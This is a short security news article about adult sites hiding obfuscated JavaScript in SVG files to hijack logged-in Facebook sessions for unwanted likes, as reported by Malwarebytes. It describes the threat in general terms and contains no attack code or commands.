Exploiting SVG Files for Malware: A New Breed of Security Threats
The use of malware to generate unauthorized likes on Facebook by adult sites has taken a new turn, utilizing SVG files as a vector for the attack. This development showcases the adaptability of malicious actors who now embed exploit codes within these files to infiltrate unsuspecting users’ browsers.
SVG, or Scalable Vector Graphics, is a popular format known for its scalability and detailed rendering capability. Unlike its counterparts such as JPEG or PNG, SVG relies on XML-based text to maintain quality over size variations, providing a loophole — malicious content can be hidden in the form of HTML and JavaScript, thus posing a serious security risk to users.
Security experts from Malwarebytes have unearthed a campaign by several adult sites that distribute .svg files embedded with a specific kind of malware. This hidden code, when activated by a user’s click, discreetly registers a like on Facebook pages that promote these sites, leveraging users’ open session vulnerabilities.
Decoding these attacks requires navigating through complex obfuscation techniques. A notable one involves ‘JSFuck’, a method for encoding JavaScript using a minimal set of characters into undecipherable text. The end goal of this obfuscation is to deliver the Trojan.JS.Likejack—malicious software that exploits logged-in Facebook sessions to boost page likes without user consent.
Several cases of SVG misuse have been documented over the years. Notably, in 2023, a cross-site scripting defect in Roundcube was exploited through SVG tags, impacting numerous webmail services globally. More recently, phishing tactics have involved SVG files serving as conduits for fraudulent login prompts, prefilled with target details, making the threat adaptive and persistent.
Tracking the offending platforms, Malwarebytes identified numerous sites operating on WordPress that persistently utilize these tactics. Facebook, aware of such exploitations, continues to eliminate such accounts, yet the culprits quickly return with new profiles. This ongoing cycle highlights the challenges in combating digitally-embedded threats.
